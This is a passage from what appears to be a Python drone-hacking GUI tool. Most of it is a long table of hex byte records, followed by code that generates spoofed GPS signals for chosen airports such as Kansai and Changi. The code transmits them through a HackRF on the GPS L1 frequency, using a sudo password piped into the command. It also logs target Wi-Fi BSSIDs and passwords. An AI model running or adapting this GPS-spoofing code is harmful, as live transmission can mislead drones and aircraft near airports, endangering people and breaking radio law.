0xa5,0xe0,0xe3,0x9c,0x9e,0x1d,0xf1,0xd8,0xf3,0x82,0x4a,0x72,0xf9,0xf7,0x95,0xa8, 0x6b,0x91,0x7e,0x67,0x5e,0x46,0xac,0xf8,0x53,0x99,0x48,0xf,0xfa,0x41,0x24,0x2a],[ # Record 49: Address = 0x2880, Length = 128 0x2880,0x80, 0x50,0xd3,0xc5,0x95,0x67,0x96,0x5c,0x46,0xd7,0xc,0xc9,0x8a,0x34,0x9,0x1a,0xfc, 0xc8,0x6b,0x3d,0x61,0xc1,0x6c,0xb5,0xae,0x9c,0x6b,0x4d,0x2a,0x36,0xca,0xf2,0x53, 0xce,0xf9,0x38,0xed,0x7c,0x0,0xcf,0xd5,0x2a,0x85,0x7f,0x62,0xc8,0x22,0x3e,0x7f, 0x3b,0x2b,0xea,0xde,0xa8,0xc5,0x3c,0x9c,0xb3,0x52,0x3b,0x82,0x10,0xee,0x4e,0xfa, 0xf1,0x14,0xce,0x2e,0x9e,0xb7,0x32,0x4,0xfb,0xb2,0x98,0x65,0xca,0x4f,0x53,0x4f, 0xaf,0x3b,0x56,0xd8,0xa,0x9f,0xc5,0x6a,0x7,0x66,0xbd,0xc5,0xc4,0x4b,0x81,0x27, 0xe,0x15,0x3,0x85,0xd0,0x7b,0x0,0xa2,0x34,0x7d,0xa5,0xd8,0x9d,0x2e,0x2c,0xab, 0xe9,0x9b,0x69,0x4,0x8e,0x51,0x5e,0xa4,0x97,0xda,0xb5,0xf,0x3b,0x61,0x23,0x25],[ # Record 50: Address = 0x2900, Length = 128 0x2900,0x80, 0x25,0x8d,0xf3,0x3f,0xbb,0xda,0xb6,0x9e,0x2e,0xb2,0xc,0x44,0xbe,0x4d,0x58,0x7b, 0x8c,0x10,0xce,0x1c,0x73,0xa7,0x12,0x0,0x2,0x8c,0x81,0x98,0xe5,0x50,0x8c,0x2a, 0x4d,0xa,0x1,0xa7,0xad,0xb2,0xec,0x53,0xec,0x57,0x81,0x57,0x97,0x95,0x2b,0xd8, 0x6f,0x3f,0x85,0x27,0x4a,0x66,0x77,0x13,0xd7,0x66,0x1e,0x1b,0x31,0xb6,0x41,0x54, 0x4,0x84,0xa,0xd8,0xc0,0xf2,0x56,0xc2,0x4,0x3,0x99,0x74,0x47,0xb9,0x7b,0x27, 0x1a,0xb8,0x71,0x8b,0x7b,0x48,0xaf,0xf7,0x94,0x6e,0xfd,0x99,0x45,0x2e,0xa1,0x26, 0xc5,0x7a,0x91,0xec,0x8e,0x72,0xaa,0xbb,0x5e,0xe0,0xc6,0xce,0xfe,0xe4,0x86,0x2a, 0xda,0x89,0xa8,0xda,0x8e,0xec,0x6d,0xce,0x8e,0xea,0x24,0x25,0x3,0xc,0x6,0xc],[ # Record 51: Address = 0x2980, Length = 128 0x2980,0x80, 0x83,0x95,0xe1,0x14,0x69,0x5a,0xe2,0x49,0xd9,0x29,0x15,0xcd,0xc6,0xe4,0xbb,0x5d, 0x91,0xb,0x5,0xa,0x9f,0xac,0x57,0xf4,0x2d,0xe8,0x79,0x94,0x61,0x62,0xb7,0xb1, 0xcd,0x5a,0x36,0xc7,0x72,0x2f,0x65,0xea,0xc2,0x1d,0x2c,0xb,0x6f,0x9c,0xbc,0xac, 0x4e,0x5c,0xe6,0x6a,0xde,0x38,0x64,0x45,0xa1,0x9e,0xb2,0xa0,0xaa,0x85,0xa9,0x83, 0x47,0xd2,0x17,0xb3,0x49,0x65,0xb,0xd3,0x7f,0x99,0x32,0x25,0x92,0xe1,0xb1,0x4f, 0xd4,0xcc,0x1e,0xd3,0xbc,0xf1,0xb8,0xf7,0xb8,0x6f,0x42,0x4c,0x52,0x72,0x31,0x4b, 0x34,0x34,0x9d,0x4d,0x2b,0x6a,0x9e,0xbb,0x41,0xf,0x76,0xff,0x10,0x62,0xf0,0x35, 0xef,0x9f,0x55,0xd3,0x52,0xa9,0xf1,0x3b,0x91,0xba,0xf7,0x42,0x7a,0x55,0xec,0x61],[ # Record 52: Address = 0x2a00, Length = 128 0x2a00,0x80, 0xd5,0x2a,0x22,0x57,0x97,0xc2,0x40,0x8c,0x72,0x59,0x21,0x88,0x5b,0x65,0x85,0x8b, 0x87,0xe3,0x41,0x6d,0x84,0x16,0x25,0xbe,0x2a,0x48,0x8a,0x9b,0x38,0x28,0x71,0xcf, 0x9a,0xbd,0xdb,0x84,0xa7,0x4f,0x18,0x63,0xef,0x23,0x5d,0x33,0x94,0xfe,0x51,0x94, 0xdf,0x83,0x0,0x8d,0x34,0x9e,0x5c,0xd9,0xc0,0xfc,0xc4,0x32,0x4e,0x4e,0x22,0xcd, 0x6a,0x5,0x66,0xe7,0xac,0x3c,0xf7,0x10,0xd3,0xc3,0x2,0x89,0x93,0x2b,0x4d,0x1b, 0xa7,0x9,0x4e,0xf3,0x23,0x5d,0x81,0x9f,0xaa,0xb9,0x97,0xe6,0xc5,0x22,0x29,0xf9, 0x4c,0xc4,0xe,0x93,0x3e,0xc3,0x4b,0xb4,0x7a,0xde,0x89,0xfe,0xdc,0xe,0x56,0xd5, 0xdd,0xaf,0xe8,0x4d,0x14,0x1e,0x39,0xab,0x1c,0xdb,0x7d,0x52,0x58,0xbf,0xb7,0x88],[ # Record 53: Address = 0x2a80, Length = 128 0x2a80,0x80, 0xb5,0xf3,0xf0,0x8,0x8d,0x71,0x36,0x2f,0xe2,0x26,0x3d,0x99,0x80,0xbf,0x88,0x46, 0x83,0x0,0x72,0x7c,0xcf,0x3e,0xc8,0x38,0x5c,0x26,0x4f,0x7d,0x49,0x1a,0x89,0x20, 0xa7,0xdf,0x87,0x37,0xcc,0xb2,0x79,0x7f,0xa4,0x6a,0x67,0xdd,0xf9,0xdf,0x4e,0x8, 0x8f,0x1a,0x93,0x65,0xe0,0x19,0x1e,0x8a,0x34,0x33,0xf4,0xac,0x54,0x8f,0xb2,0xd9, 0xdd,0xb1,0xf0,0x66,0xa3,0x60,0x46,0xe2,0xd5,0xd3,0x66,0x60,0x3d,0xf7,0xc4,0xe9, 0xa6,0x1d,0xe7,0xf,0xf,0x6e,0x81,0x4e,0x5,0x5f,0x5b,0xab,0xab,0x55,0xce,0x6e, 0x87,0xf5,0xce,0x53,0x35,0x78,0x9c,0x6b,0x70,0x3d,0x59,0xa1,0x87,0x7f,0x27,0xd9, 0xe,0x3d,0xd7,0xea,0x8a,0x96,0xe7,0x6c,0xe9,0x99,0xef,0x38,0x3e,0xd4,0x6e,0x46],[ # Record 54: Address = 0x2b00, Length = 128 0x2b00,0x80, 0xba,0xe0,0x0,0xfc,0xb9,0xb3,0xaa,0x8b,0x7e,0x52,0x1d,0x72,0x52,0x47,0xbb,0x93, 0xd3,0x14,0xcc,0x20,0x4e,0x5e,0x4f,0x4,0x9a,0xc8,0x68,0xf7,0xd0,0x20,0x1,0x1f, 0x87,0x8a,0xa7,0x34,0x5a,0x71,0xf0,0x88,0xf9,0xc,0x37,0xc,0xef,0xd,0xd0,0x60, 0x90,0x7f,0x81,0x4f,0xa2,0xf4,0x42,0xbe,0xcd,0xfa,0x34,0x1e,0xbf,0x6c,0x15,0xc1, 0x4,0xc2,0x2e,0x7c,0xc,0x86,0x64,0xc4,0xa4,0xa2,0xc5,0xc2,0xf1,0x18,0x50,0x26, 0x64,0xac,0x78,0xe1,0x6d,0xc4,0x46,0x84,0x14,0x66,0xc,0xa1,0x8c,0xe9,0xf7,0x72, 0x1,0x52,0x9,0xd6,0xc3,0xb7,0xa7,0x57,0xb,0xa8,0x89,0x6,0xdb,0x17,0x4f,0x28, 0xb,0x22,0x5,0x3c,0x98,0xa2,0x76,0x1b,0x3c,0x16,0x2,0x9f,0x3a,0x8,0xbb,0x34],[ # Record 55: Address = 0x2b80, Length = 128 0x2b80,0x80, 0xd8,0x48,0xac,0xf8,0x55,0x3a,0x3f,0xc,0xab,0x49,0xb5,0x6e,0x30,0x86,0x5a,0xc2, 0xe3,0x29,0xfa,0x5b,0x2a,0xc0,0xc3,0x17,0x82,0x6c,0x46,0x98,0xac,0x28,0xc8,0x38, 0xd2,0x48,0xee,0xb,0x5d,0x7d,0x46,0x17,0xca,0xb9,0xff,0xd3,0x4e,0x31,0x31,0xf, 0x9d,0xbf,0x9,0x4e,0x47,0x7b,0xd9,0x6b,0xa0,0xa1,0xb3,0x84,0x5b,0x61,0x53,0x43, 0x72,0x9d,0xbd,0x50,0x5,0xa9,0xec,0x9f,0xef,0x30,0x2c,0xef,0x74,0x60,0xc6,0x46, 0x8f,0x47,0x27,0x5a,0xe6,0xcc,0xf3,0x15,0xa9,0x54,0xe4,0x78,0x93,0xc8,0x3c,0x37, 0xe5,0xf8,0x6b,0x47,0x55,0x30,0x9c,0x51,0x6c,0x1b,0xc4,0xa,0xac,0xe7,0x37,0xef, 0xc1,0x4,0xb8,0x52,0x29,0xbf,0xcf,0x87,0xa,0x6d,0xc3,0xd6,0xa,0x59,0x99,0x39],[ # Record 56: Address = 0x2c00, Length = 128 0x2c00,0x80, 0xba,0x78,0xab,0x8f,0xca,0x83,0x32,0x34,0x48,0x14,0x72,0xa3,0xf,0x7e,0x77,0x2f, 0xc9,0x75,0xe0,0xcd,0xc2,0x69,0xf8,0x1a,0x4f,0x35,0xef,0xf6,0x7e,0x81,0xa6,0x9b, 0x85,0x92,0x16,0xd,0x19,0xdf,0xeb,0xc9,0x92,0xc1,0xc3,0x42,0x8d,0xe4,0x5a,0xa, 0x3c,0x1e,0x3d,0x50,0xbf,0x1c,0xa6,0x14,0x8e,0xa6,0x73,0xb9,0x60,0xd9,0xd8,0x86, 0x84,0x16,0x67,0x92,0x73,0xf1,0xef,0x14,0x52,0x73,0x67,0xb0,0xba,0xb1,0x89,0xf9, 0x99,0xfa,0x3b,0xe9,0xe8,0x45,0x3b,0xbd,0x5,0xe5,0xac,0xe,0x28,0x95,0x5,0x62, 0x4c,0x68,0x62,0x50,0x10,0x7e,0xba,0xb5,0xe3,0x2b,0x2a,0x93,0x50,0x5f,0x79,0x55, 0x2e,0xff,0xd7,0x99,0xe2,0xdf,0x80,0x58,0x48,0xcb,0x65,0x5c,0xd2,0x6e,0xb9,0x9c],[ # Record 57: Address = 0x2c80, Length = 128 0x2c80,0x80, 0x6a,0x8b,0xa1,0x75,0xbb,0x95,0x42,0x1b,0x4d,0x5,0x2b,0x5f,0x8a,0x3e,0xba,0x30, 0xa2,0x1,0xe5,0x2b,0xaa,0x38,0xa9,0x36,0x59,0xe8,0x3d,0x62,0x3d,0xd8,0x42,0xfe, 0x86,0x4f,0xa7,0xca,0xcc,0x41,0xe0,0x89,0xbc,0x65,0xaa,0xa2,0xcd,0x27,0x8d,0x37, 0x88,0xac,0x38,0x38,0x36,0x48,0xaf,0x27,0xb,0xdf,0x54,0x3f,0x95,0x5d,0x9e,0xd9, 0xca,0xa7,0x50,0xc4,0xf5,0xbd,0xab,0x6c,0xb5,0xab,0x2,0x9,0x33,0xbf,0x91,0xf0, 0x53,0xb,0x91,0x6c,0xbb,0x10,0x20,0x2b,0xf,0xef,0xfb,0x88,0xc,0x73,0x13,0x59, 0x3,0xed,0xde,0x7c,0x7e,0x41,0xd1,0xe1,0x3f,0x83,0x63,0x1,0x75,0x64,0x18,0x8e, 0xa7,0x4a,0x67,0x18,0x22,0x1a,0x6f,0x29,0x31,0x45,0x36,0x16,0x36,0x77,0x93,0xf4],[ # Record 58: Address = 0x2d00, Length = 128 0x2d00,0x80, 0x46,0xd,0xaf,0xee,0x8a,0x68,0x23,0x56,0xcf,0x90,0x83,0x73,0x75,0x2f,0x11,0xb4, 0x23,0x4c,0x12,0x16,0x7f,0x5e,0xdb,0xb1,0x49,0xaf,0x7e,0xba,0x87,0x55,0x1e,0xe7, 0xb7,0x93,0x6e,0xe,0x3d,0x85,0xdf,0xa7,0xf,0x1b,0x2b,0xa7,0x69,0x5a,0x72,0xa8, 0xc3,0x25,0x4c,0xe9,0x6d,0xd0,0xe6,0x7,0xc7,0xce,0x52,0x89,0xef,0xe1,0x32,0x7d, 0x1e,0x7c,0xb3,0xe1,0x47,0xbe,0x22,0xb4,0xb3,0x52,0x39,0x49,0xa4,0x61,0x0,0x26, 0x29,0x67,0x6,0x4a,0x74,0x6,0x6f,0x1f,0x89,0xe,0x1d,0xbf,0x61,0x28,0xfe,0x21, 0x6a,0xc3,0xae,0xdd,0x48,0x65,0x9b,0x4b,0x5e,0x3d,0xa5,0x2f,0x3d,0x36,0x3b,0x41, 0x8e,0x61,0x50,0xfb,0x22,0xa2,0xa1,0x1d,0x57,0x7b,0x86,0x75,0x63,0xbb,0xca,0xd3],[ # Record 59: Address = 0x2d80, Length = 128 0x2d80,0x80, 0xf6,0xe,0x9,0x71,0xcc,0xec,0x8f,0xed,0xeb,0x4a,0xe9,0xc6,0xd0,0xca,0x57,0x8, 0xc9,0xc2,0x1a,0xa1,0x96,0xcc,0x16,0x96,0xe8,0xe5,0xd6,0x11,0xbe,0xf1,0x75,0x8a, 0x6a,0xc6,0xc2,0x3e,0xa5,0xde,0x6b,0xb5,0xa2,0x28,0xf0,0x99,0x8a,0xef,0xf9,0x34, 0x9b,0x47,0xe1,0xc9,0xf2,0x63,0xc2,0x52,0x51,0x44,0xbd,0xb2,0x1a,0x1a,0xf9,0xf3, 0xb4,0x77,0x83,0x1,0x7f,0x30,0xae,0x41,0x10,0x44,0x9,0xd8,0x58,0xf2,0xc,0x15, 0xa8,0xb0,0x4f,0x87,0xf2,0x4,0x66,0xa3,0x89,0x57,0x58,0x90,0x36,0xfa,0xf3,0x44, 0x60,0x75,0xdb,0xed,0xa9,0xb1,0x4d,0x8f,0x43,0xa4,0x5d,0x55,0xf1,0xcc,0x6a,0xb1, 0x0,0xfb,0x1d,0x22,0x71,0xd5,0x13,0x2,0xf6,0x67,0xc1,0x9d,0x7f,0x59,0xef,0x81],[ # Record 60: Address = 0x2e00, Length = 128 0x2e00,0x80, 0xfd,0x35,0x99,0x58,0x3c,0xae,0xf9,0xf0,0xce,0x2a,0x16,0xb9,0x5e,0x67,0x90,0x1, 0xf4,0xb,0xf,0x9b,0x8c,0xc8,0x4f,0x41,0xbc,0x67,0x67,0x5e,0xeb,0x63,0x5a,0xcc, 0xb0,0x91,0xe,0xb3,0x8b,0xb0,0xa0,0x2,0xf5,0xd8,0x95,0x95,0x96,0x73,0x6a,0xbf, 0x8d,0x12,0xaa,0xe9,0x19,0xc0,0xa0,0xfa,0xc,0xde,0x37,0x1e,0x99,0xbc,0xb8,0xfa, 0xc,0x88,0x23,0xaf,0xf2,0x6,0xd3,0x68,0xc6,0x1e,0xef,0xf1,0x4a,0xd,0x80,0x7, 0x80,0x63,0x39,0x15,0x95,0xd0,0xcc,0x2b,0x73,0xad,0x4e,0xdf,0x87,0xa1,0x92,0x5b, 0x93,0x1c,0x12,0xca,0x78,0xd9,0x19,0x71,0x21,0x87,0xdd,0x27,0x70,0x62,0x9f,0x63, 0x7d,0x8a,0x18,0x20,0x16,0x20,0xb2,0x78,0x8b,0x94,0x2,0x78,0xb0,0x7,0x34,0xf8],[ # Record 61: Address = 0x2e80, Length = 128 0x2e80,0x80, 0xa,0xbb,0x5,0xed,0x5a,0x7b,0xb9,0xc,0xf8,0x27,0x8f,0x9e,0x98,0x52,0x61,0xa6, 0xee,0xb0,0x64,0x6,0x4a,0xbf,0x40,0xdd,0xe,0xed,0x73,0x33,0x32,0x75,0x26,0x4a, 0x96,0x83,0x74,0x52,0x40,0xa2,0x8f,0xf5,0x9,0xd0,0xa,0x9e,0xe2,0x9b,0xd,0x20, 0x94,0xf,0xfb,0xf4,0xb9,0xf5,0x37,0xb8,0x3c,0x4d,0x78,0xfb,0x87,0xdc,0xef,0x15, 0x5b,0xce,0x86,0xb3,0xb9,0x77,0xd7,0x61,0x79,0x65,0x40,0x1,0x71,0x0,0xc9,0xef, 0x10,0x86,0xb5,0xc6,0x1c,0xb6,0xf,0x3,0xd6,0xfe,0xa2,0x24,0xa2,0xf0,0xef,0x2e, 0x88,0xef,0x25,0x7c,0x97,0x71,0xe8,0xff,0x10,0x8a,0xe3,0x5c,0xe8,0x8d,0x49,0x2e, 0xbe,0x35,0xe1,0x7f,0x3a,0xd2,0x40,0xd8,0x8d,0x3d,0x27,0x52,0x91,0x3b,0x2,0x55],[ # Record 62: Address = 0x2f00, Length = 128 0x2f00,0x80, 0xab,0xd0,0x26,0x8,0xc6,0x81,0xb3,0x5f,0x5d,0xa5,0x8d,0x75,0xd,0x30,0x81,0xe1, 0x63,0xde,0x3d,0x6,0x35,0x85,0x84,0x3d,0xaf,0xf6,0xbc,0x94,0x8f,0xb5,0xd5,0x82, 0x60,0x9a,0x55,0x3c,0x70,0x4f,0xa8,0x49,0xfc,0xd4,0x4a,0xba,0x9,0xc3,0x1b,0xf5, 0x2b,0xbb,0x89,0xb2,0x3e,0xb4,0xa8,0xc3,0x38,0xe0,0x60,0x17,0xe6,0xcf,0x1f,0x1c, 0x9b,0x74,0x9,0xf0,0x1,0xb,0x4e,0x78,0xb2,0x46,0xcc,0x9c,0xb7,0xb0,0x5a,0x1b, 0xb8,0x43,0x1b,0x21,0xa5,0x1b,0x6f,0x5,0x84,0x36,0x7a,0xbb,0x25,0x3,0x38,0xac, 0xe5,0xd4,0x40,0xbb,0xed,0x91,0x17,0x78,0x5d,0x7,0x9e,0x64,0xba,0xdf,0x67,0x5e, 0x69,0x37,0xaa,0x9f,0x9e,0xbc,0x8e,0x76,0xe6,0xa2,0x79,0xe3,0x6c,0xba,0x31,0x20],[ # Record 63: Address = 0x2f80, Length = 128 0x2f80,0x80, 0xf7,0x48,0xdf,0x78,0x78,0x2c,0x3,0xb3,0xdf,0xf0,0x27,0xae,0xf4,0xde,0x18,0xba, 0xae,0x51,0x81,0xdc,0x64,0x1f,0x35,0x5,0x8c,0xef,0x5b,0x97,0x38,0x2d,0x55,0x44, 0x85,0xce,0x4,0xd9,0x16,0x3b,0xc3,0x71,0x9e,0xda,0xa6,0x42,0xfc,0xc5,0x56,0x3b, 0xa3,0xca,0xee,0x52,0x4f,0xc7,0x90,0xca,0x58,0x7c,0x98,0x61,0x34,0x94,0xa1,0xf3, 0x29,0xc5,0x18,0xc5,0xba,0x14,0xb3,0xe3,0x3b,0xb9,0x62,0xb5,0x30,0x3b,0x35,0xba, 0xd2,0x63,0xcc,0x65,0x18,0xf6,0x19,0x6,0xee,0x6,0x15,0x40,0xd,0x90,0xf8,0xb7, 0xcb,0xb6,0x71,0xc7,0x50,0x13,0xf4,0x83,0xfa,0x4e,0x2c,0x8d,0x4e,0x1c,0x98,0xeb, 0xa9,0x5b,0x5,0xa8,0xa6,0x53,0xa6,0x4d,0x4d,0x9,0xee,0x22,0xc6,0xb7,0x64,0x63],[ # Record 64: Address = 0x3000, Length = 128 0x3000,0x80, 0xf8,0x4a,0x30,0x51,0x1f,0x82,0x8f,0x24,0x77,0xb6,0x0,0x59,0x2,0x7d,0x11,0x2f, 0x10,0xb,0xda,0xb7,0xb3,0xbb,0x5b,0x51,0x0,0xc9,0x43,0x48,0x6a,0x67,0x92,0xb5, 0x3,0x97,0xc1,0x78,0x9e,0xa6,0xf4,0xf1,0x57,0xa9,0x8a,0x5e,0x32,0x2,0x5b,0xc4, 0xe,0xa8,0x63,0x99,0x99,0x7a,0x6c,0x80,0xd1,0x87,0x27,0x5,0x6,0xde,0x26,0x9f, 0x19,0xa1,0x62,0x5b,0x36,0xf1,0x46,0x9c,0x9d,0x54,0x74,0x89,0xf1,0xb4,0x5c,0x2c, 0xe6,0xec,0x8e,0xfa,0x4b,0xff,0xf3,0x91,0xea,0xb1,0x26,0x0,0x2b,0x0,0x1b,0x9b, 0x12,0xe0,0x29,0x56,0xc8,0x0,0x43,0xc8,0x9d,0x75,0x93,0xfb,0xa9,0x9e,0x99,0x71, 0x67,0x60,0x6f,0xef,0xc7,0xfa,0xbf,0x52,0x90,0xd3,0x20,0x19,0xd4,0xaf,0x4,0x35],[ # Record 65: Address = 0x3080, Length = 128 0x3080,0x80, 0xec,0xc4,0x3d,0xa1,0xd9,0x3d,0x2a,0xb0,0xcd,0xca,0x65,0xea,0x6c,0x5b,0xd6,0x38, 0xa0,0x7d,0x7d,0x8,0x88,0xc5,0x33,0xdd,0xa1,0xa,0xae,0xa,0x92,0xe9,0x6d,0xae, 0x61,0xf2,0x2c,0xdf,0xe8,0x55,0xd8,0xae,0x18,0xcd,0x1c,0x42,0x7b,0x37,0xa2,0x4f, 0x5f,0x64,0xd,0xdc,0x8a,0xe8,0xcb,0x34,0x5c,0xb7,0x2,0xc,0xe3,0xb1,0x28,0xb4, 0xb8,0xda,0xd0,0x5e,0x36,0x4a,0xf3,0xe4,0x37,0x12,0xfd,0xe2,0x16,0xeb,0x80,0xe6, 0x45,0xa9,0x3a,0x19,0xb2,0xf9,0xd1,0x44,0x75,0xfe,0x5c,0x73,0x84,0x52,0x43,0xc9, 0xad,0x4e,0xd1,0x4e,0x42,0x61,0x81,0xac,0x3b,0xb5,0xa0,0xf3,0x7c,0x2f,0x72,0x6f, 0x13,0x19,0xd3,0x6f,0xfb,0x9a,0xa,0x32,0x9,0x3e,0x97,0xb6,0xc0,0x9e,0xff,0xce],[ # Record 66: Address = 0x3100, Length = 128 0x3100,0x80, 0xe8,0x62,0x77,0x73,0x37,0xb8,0xc4,0x11,0x4c,0x58,0x93,0xdb,0x94,0xed,0x1a,0x60, 0x44,0xda,0x78,0xe4,0xfe,0x11,0x1d,0xe8,0xf9,0xff,0x1c,0xbe,0xea,0x56,0xb0,0x4f, 0x91,0x40,0x7e,0x5,0x2,0x84,0x1e,0xb5,0x6a,0x9a,0xca,0x8d,0xd4,0x67,0x23,0x71, 0x2b,0x95,0x9e,0x26,0x63,0xcf,0xee,0x7e,0x14,0xb5,0xc,0x7c,0x74,0x90,0x4c,0xc3, 0x2a,0xd4,0xe,0xb9,0x1e,0xbd,0xf3,0xe,0x70,0x99,0xd3,0x3d,0xd6,0x6,0x33,0xf, 0x9,0xcd,0xb8,0xac,0x60,0x4f,0x5,0x71,0xb5,0xde,0xec,0x1f,0x8,0x77,0x37,0xa5, 0x5b,0xb2,0x66,0x74,0xbf,0x0,0x9f,0xaf,0xfe,0xe1,0xfb,0x0,0x26,0x25,0x32,0xa9, 0x18,0xc3,0xa7,0x97,0x3b,0x26,0x56,0x97,0x86,0xe6,0xb0,0x6f,0x63,0x55,0x39,0x8c],[ # Record 67: Address = 0x3180, Length = 128 0x3180,0x80, 0x7c,0xa8,0xb3,0x41,0x88,0xf9,0xd0,0xed,0xbc,0xd9,0xb,0xfe,0x62,0x61,0x71,0x3e, 0xcb,0x1d,0xb8,0xc6,0xdd,0x1f,0xb1,0xde,0xf5,0x27,0xf2,0x8d,0x85,0x6f,0x9f,0xfb, 0xd4,0x36,0xe1,0xfb,0x95,0x90,0xd9,0x11,0x4e,0x48,0x4e,0x1c,0x85,0x27,0x7,0xd7, 0x56,0x3e,0x38,0x28,0x7,0x8c,0x76,0xc7,0xb1,0x6,0x46,0xd5,0xad,0x5f,0x8,0x3c, 0xe0,0x6f,0x1a,0xb6,0xa4,0x2b,0xd1,0xa9,0xe6,0x7f,0xd0,0x27,0xc4,0x61,0xab,0x5d, 0xef,0xf,0x69,0x59,0x5,0x0,0xf,0x15,0xe3,0xde,0xa0,0xa,0xe4,0x1,0x9b,0x69, 0x23,0x47,0x7a,0x7d,0xa3,0xa,0x8c,0x36,0x7d,0x8c,0xd6,0x84,0xdd,0xea,0x5c,0x12, 0xc8,0xbe,0x72,0x38,0xa7,0x90,0x46,0x18,0x58,0x85,0xf6,0xd2,0xbc,0xc8,0x49,0x6a],[ # Record 68: Address = 0x3200, Length = 128 0x3200,0x80, 0x5b,0xa3,0x80,0x91,0x2d,0xfc,0xad,0xf0,0x9e,0x3a,0x2a,0xbf,0x59,0x23,0xab,0xfc, 0xdb,0x2b,0xd5,0xd6,0x7b,0x80,0x3d,0x7,0x23,0xd0,0xf8,0x84,0x2b,0xa2,0xfd,0x5a, 0xe,0x2b,0x9a,0xb,0x91,0xef,0x59,0x51,0x32,0x11,0x3e,0xb,0x94,0x9e,0xd1,0xe, 0xe4,0x43,0x28,0x85,0xa7,0xd0,0xd8,0x14,0x39,0xc5,0xf,0x96,0x8e,0xc4,0x22,0xbb, 0x54,0xe,0x8f,0x7f,0x18,0x8f,0x2e,0xa4,0x53,0xb,0xe6,0x3f,0x33,0xe0,0xeb,0x7d, 0x6b,0x9a,0x3f,0xf,0x5d,0x40,0x1c,0xfe,0xeb,0x81,0xe1,0x4b,0xf,0xe8,0xb0,0xdc, 0x41,0x83,0x17,0x99,0x77,0x3b,0x35,0x1,0x22,0x88,0xfa,0x19,0xcf,0x4c,0x9e,0xed, 0x82,0x2c,0x4c,0x58,0xa,0xb8,0x9a,0xe,0x47,0x89,0x68,0xda,0xb5,0x5b,0x65,0xd8],[ # Record 69: Address = 0x3280, Length = 128 0x3280,0x80, 0xb3,0xd2,0x17,0xf3,0x15,0x9d,0x36,0xad,0x8c,0xc5,0x2,0x1,0xf3,0x46,0xa0,0x1e, 0xa3,0xc,0x7f,0xef,0x5b,0xa7,0xeb,0xb5,0x7e,0x6b,0x11,0xe1,0x58,0x16,0xf0,0x77, 0xf3,0x7f,0x57,0xb9,0x3c,0x13,0x70,0xe,0xb0,0x73,0x38,0x65,0x36,0x99,0x2a,0x78, 0xa3,0x62,0x2,0xc0,0xd2,0x7f,0xb,0x4a,0xb3,0x5c,0xda,0x15,0x14,0x67,0x42,0x90, 0xa8,0x71,0xb1,0x7d,0xe6,0x4c,0x5c,0xca,0x3e,0xf2,0x26,0xdd,0xda,0xdb,0x65,0x2c, 0xc,0xf4,0xfc,0x47,0x6a,0xd5,0xae,0x73,0x7a,0xe2,0xbe,0xd6,0x48,0xea,0x45,0xf3, 0x32,0x14,0xa1,0xf1,0xe4,0x50,0x74,0x45,0x87,0x40,0x82,0x73,0x87,0x1a,0x9a,0xe8, 0xd1,0x1a,0x2e,0x24,0xf3,0xe1,0xe7,0xf2,0xe4,0x51,0xd0,0x84,0x69,0x6e,0xc0,0xab],[ #
= "normal") self.info_label.config(text = "Transmission fake GPS signal.") try: self.attack_button.config(text = "Stop attack", image = self.attack_button_stop_icon, command = lambda: self.stop_attack()) except: #If icon not found self.attack_button.config(text = "Stop attack", command = lambda: self.stop_attack()) transmission_fake_gps_states = subprocess.Popen("echo " + sudo_password + " | sudo -S hackrf_transfer -t " + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/kansai_international_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47 -R", stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell = True) transmission_fake_gps_states.communicate() self.info_label.config(text = "Completed.") self.bace_to_homepage_button.config(state = "normal") self.progressbar.stop() try: self.attack_button.config(text = "Start attack", image = self.attack_button_start_icon, command = lambda: threading.Thread(target = self.check_selection).start()) except: #If icon not found self.attack_button.config(text = "Start attack", command = lambda: threading.Thread(target = self.check_selection).start()) else: self.fake_gps_attack_file_missing() elif self.user_selected_location == "Singapore Changi Airport": self.check_fake_gps_file = Path(current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/singapore_changi_airport.bin") if self.check_fake_gps_file.is_file(): self.progressbar.start() self.attack_button.config(state = "normal") self.info_label.config(text = "Transmission fake GPS signal.") try: self.attack_button.config(text = "Stop attack", image = self.attack_button_stop_icon, command = lambda: self.stop_attack()) except: #If icon not found self.attack_button.config(text = "Stop attack", command = lambda: self.stop_attack()) transmission_fake_gps_states = subprocess.Popen("echo " + sudo_password + " | sudo -S hackrf_transfer -t " + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/singapore_changi_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47 -R", stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell = True) transmission_fake_gps_states.communicate() self.info_label.config(text = "Completed.") self.bace_to_homepage_button.config(state = "normal") self.progressbar.stop() try: self.attack_button.config(text = "Start attack", image = self.attack_button_start_icon, command = lambda: threading.Thread(target = self.check_selection).start()) except: #If icon not found self.attack_button.config(text = "Start attack", command = lambda: threading.Thread(target = self.check_selection).start()) else: self.fake_gps_attack_file_missing() else: self.fake_gps_attack_file_missing() def fake_gps_attack_file_missing(self): show_fake_gps_attack_timestamp = time.strftime("%Y/%m/%d-%H:%M:%S") #Create a timestamp self.check_log_file = Path(current_path + "/data/hack_drone_log.csv") if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist target_BSSID_log = [""] channel_log = [""] privacy_log = [""] password_log = [""] manufacturer_log = [""] client_BSSID_log = [""] selected_ap_timestamp_log = [show_fake_gps_attack_timestamp] states_log = ["Error: Fake GPS attack file not found. Generating fake GPS file, latitude: " + self.get_user_type_in_latitude + ", longitude: " + self.get_user_type_in_longitude + ", airport: " + self.user_selected_location] dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":<PASSWORD>, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log,"timestamp":selected_ap_timestamp_log, "states":states_log}) dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ',', mode = "a", header = False) #Write log data to "drone_attack_log.csv" generate_fake_gps_file = "cd " + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim; ./gps-sdr-sim -b 8 -e brdc1040.21n -l " + self.airports_latitude + "," + self.airports_longitude + ",100" #print(generate_fake_gps_file) self.progressbar.start() self.info_label.config(text = "Please wait for about 1 minute, generating fake GPS file.") generate_fake_gps_states = subprocess.Popen(generate_fake_gps_file, stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell = True) generate_fake_gps_states.communicate() self.attack_button.config(state = "normal") self.info_label.config(text = "Transmission fake GPS signal.") try: 